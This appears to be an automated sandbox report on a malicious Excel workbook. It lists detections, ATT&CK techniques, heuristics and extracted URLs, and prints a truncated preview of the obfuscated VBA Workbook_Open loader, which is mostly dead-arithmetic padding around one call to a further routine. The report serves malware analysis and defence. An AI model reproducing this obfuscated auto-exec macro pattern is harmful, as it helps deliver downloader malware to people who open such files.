Verdict: MALICIOUS
Risk Score: 382

MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File

Malware Insights
The file contains both Excel 4.0 macros and obfuscated VBA code, including a Workbook_Open event handler that uses GetObject and CallByName. These macros are designed to execute a payload, likely by downloading it from the suspicious URL http://攮畤戯慬正潢牡ᵤ. The presence of multiple macro types and obfuscation suggests downloader or dropper functionality.
Heuristics (10)

- ClamAV: Xls.Malware.Valyria-9756472-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Xls.Malware.Valyria-9756472-0
- URL reconstructed from XLM cell array (3 URLs) [critical, OLE_XLM_CELL_ARRAY_URL]: The Excel 4.0 macro sheet stages its payload URL across the BIFF8 Shared String Table (one quoted-char SST entry concatenated with & at runtime), across individual numeric cells (one ASCII charcode per cell), or across multi-char fragment cells that a download formula concatenates by reference (=A1&A2&… / CONCATENATE(...)). The reconstructed URL is invisible to literal-bytes URL extraction because it is never contiguous in the workbook stream. URLs were recovered by walking the BIFF8 record stream and decoding SST entries, LABELSST/RK/NUMBER cells, and FORMULA cell-reference concatenation in token order.
- VBA macros detected [medium, OLE_VBA_MACROS, 5 related findings]: Document contains VBA macro code
- Obfuscated auto-exec VBA loader [critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER]: Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- Workbook_Open macro [high, OLE_VBA_WBOPEN]: Workbook_Open macro
- GetObject call [high, OLE_VBA_GETOBJ]: GetObject call
- CallByName call [high, OLE_VBA_CALLBYNAME]: CallByName call
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: The compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Excel 4.0 (XLM) macro sheet present [medium, OLE_XLM_AUTOOPEN]: The workbook contains an Excel 4.0 macro sheet sub-stream; XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://攮畤戯慬正潢牡ᵤ (referenced by macro)
  - http://www.cmu.edu/blackboard (referenced by macro)
  - http://www.cmu.edu/blackboard/files/evaluate/tests-example.xls (referenced by macro)
  - http://www.cmu.edu/blackboard/evaluate#manage_tests/import_questionsc (referenced by macro)
  - http://www.cmu.edu/blackboard/evaluate#manage_tests/import_questions (referenced by macro)
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 5259 bytes | 1c7cdc6786ec2549a8673840191b5075bee5e693039f038547e06bdc7f4310e6 |
Preview script: first 1,000 lines of the extracted script
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6573 bytes | c3b37ce26036ada3bf9136ecf08fed60269f93633bd31389689f9d7df3ad9bd6 |
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Public aaa As Long
' Helper: splits r on the delimiter v648dcc371963e (default ",") and returns the pieces as a String array
Private Function cdf9b73259bf(r, Optional v648dcc371963e As String = ",") As String()
Dim r9cf644cedf As Variant
Dim pf17c4d1e2af93() As String
ReDim r9cf644cedf(0 To Len(r))
Dim i As Double, j As Double
Dim f56c463e11, t234c6f4ce9c
f56c463e11 = r
For i = 1 To Len(r)
t234c6f4ce9c = InStr(f56c463e11, v648dcc371963e)
If t234c6f4ce9c > 0 Then
r9cf644cedf(j) = Left(f56c463e11, t234c6f4ce9c - 1)
f56c463e11 = Mid(f56c463e11, t234c6f4ce9c + 1)
j = j + 1
Else
r9cf644cedf(j) = Mid(f56c463e11, t234c6f4ce9c + 1)
Exit For
End If
Next
ReDim pf17c4d1e2af93(j)
For i = 0 To j
pf17c4d1e2af93(i) = r9cf644cedf(i)
Next
cdf9b73259bf = pf17c4d1e2af93
End Function
Sub Workbook_Open()
Dim afc6d89d516c631 As Long: afc6d89d516c631 = 5
Dim ja5ba54fd576 As String
Dim ga911f99aa9121cf7a As Long
Select Case afc6d89d516c631
Case 26 - (10 + 24) - 23
If 24 > 17 Then
Dim topper_x0 As Long
topper_x0 = (11 ^ 23) * 18
Dim topper_m0 As Long
topper_m0 = (topper_x0 - 8) / 8
Else
Dim n_next_m0 As Long
n_next_m0 = ((16 * 25) + 12)
Dim topper_mNext_0 As Long
topper_mNext_0 = (n_next_m0 - 8) ^ 24
End If
Case 14 * Int(22 / 49) - Int(3910 / 2517) * 17
If 8 > 17 Then
Dim topper_x1 As Long
topper_x1 = (9 ^ 6) - 4
Dim topper_m1 As Long
topper_m1 = (topper_x1 - 15) / 23
Else
Dim n_next_m1 As Long
n_next_m1 = ((22 / 15) + 19)
Dim topper_mNext_1 As Long
topper_mNext_1 = (n_next_m1 * 27) ^ 25
End If
Case 21 - (6 + 17) - 22
If 13 > 25 Then
Dim topper_x2 As Long
topper_x2 = (16 ^ 7) - 17
Dim topper_m2 As Long
topper_m2 = (topper_x2 * 26) / 9
Else
Dim n_next_m2 As Long
n_next_m2 = ((17 - 26) + 29)
Dim topper_mNext_2 As Long
topper_mNext_2 = (n_next_m2 + 29) ^ 17
End If
Case 27 - (4 + 22) - 25
If 22 > 11 Then
Dim topper_x3 As Long
topper_x3 = (17 ^ 6) * 9
Dim topper_m3 As Long
topper_m3 = (topper_x3 / 20) / 25
Else
Dim n_next_m3 As Long
n_next_m3 = ((22 * 21) + 17)
Dim topper_mNext_3 As Long
topper_mNext_3 = (n_next_m3 - 5) ^ 10
End If
Case 27 + (120 - 60) + 26
If 21 > 7 Then
Dim topper_x4 As Long
topper_x4 = (29 ^ 9) / 10
Dim topper_m4 As Long
topper_m4 = (topper_x4 - 21) / 4
Else
Dim n_next_m4 As Long
n_next_m4 = ((24 - 5) + 29)
Dim topper_mNext_4 As Long
topper_mNext_4 = (n_next_m4 * 7) ^ 29
End If
' afc6d89d516c631 is fixed at 5 and only this arm evaluates to 5; every other Case arm is dead arithmetic padding
Case ((((5 * 8) / 4) * 4) / 8):
Dim topper_x5 As Long
topper_x5 = (22 / 4) - 12 / 12
Dim topper_m5 As Long
topper_m5 = (topper_x5 + 29) / 25
' The only live statement in Workbook_Open: hands off to md2e63b5a8c15e2, which is not in this preview
Call md2e63b5a8c15e2
Dim topper_z5 As Long
topper_z5 = (11 / 16) + 16 / 23
Dim topper_y5 As Long
topper_y5 = (topper_z5 - 20) / 15
Case 15 + (276 - 240) + 19
If 6 > 20 Then
Dim topper_x6 As Long
topper_x6 = (23 ^ 27) + 10
Dim topper_m6 As Long
topper_m6 = (topper_x6 - 24) / 9
Else
Dim n_next_m6 As Long
n_next_m6 = ((16 * 5) + 18)
Dim topper_mNext_6 As Long
topper_mNext_6 = (n_next_m6 - 13) ^ 7
End If
Case 13 / Int(14 + 8 / 11) / 13
If 20 > 6 Then
Dim topper_x7 As Long
topper_x7 = (9 ^ 17) / 25
Dim topper_m7 As Long
topper_m7 = (topper_x7 + 15) / 6
Else
Dim n_next_m7 As Long
n_next_m7 = ((10 * 10) + 5)
Dim topper_mNext_7 As Long
topper_mNext_7 = (n_next_m7 / 4) ^ 8
End If
Case 11 / Int(18 + 26 / 17) / 5
If 10 > 14 Then
Dim topper_x8 As Long
topper_x8 = (28 ^ 25) / 28
Dim topper_m8 As Long
topper_m8 = (topper_x8 - 14) / 6
Else
Dim n_next_m8 As Long
n_next_m8 = ((13 + 6) + 10)
Dim topper_mNext_8 As Long
topper_mNext_8 = (n_next_m8 - 21) ^ 16
End If
Case 16 * Int(88 / 93) - Int(2677 / 4033) * 19
If 26 > 4 Then
Dim topper_x9 As Long
topper_x9 = (15 ^ 10) * 18
Dim topper_m9 As Long
topper_m9 = (topper_x9 + 5) / 16
Else
Dim n_next_m9 As Long
n_next_m9 = ((15 + 19) + 11)
Dim topper_mNext_9 As Lo
... (truncated)